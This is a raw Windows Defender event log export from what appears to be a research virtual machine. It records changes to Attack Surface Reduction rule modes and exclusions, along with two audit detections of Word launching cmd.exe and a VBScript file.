New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1861
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1860
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1859
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1858
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1857
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1856
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1855
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1854
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1853
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1852
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1851
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1850
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1849
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1848
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1847
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1846
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1845
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1844
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1843
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1842
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1841
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1840
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1839
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1838
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1837
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
11/16/2023 05:34:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1836
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
11/16/2023 04:39:37 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1833
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\ASROnlyPerRuleExclusions\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = C:\WindowsAzure\Packages\WaAppAgent.exe
11/16/2023 04:38:59 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1832
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\ASROnlyExclusions\C:\WindowsAzure\Packages\WaAppAgent.exe = 0x0
11/16/2023 04:24:09 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1122
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1829
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard audited an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T16:24:09.858Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: cmd.exe
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 04:24:01 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1122
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1828
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard audited an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 3B576869-A4EC-4529-8536-B80A7769E899
Detection time: 2023-11-16T16:24:01.387Z
User: researchvmhaa\research
Path: C:\Users\research\AppData\Local\Temp\script.vbs
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline:
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1827
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1826
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1825
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1824
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1823
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1822
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1821
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1820
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1819
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
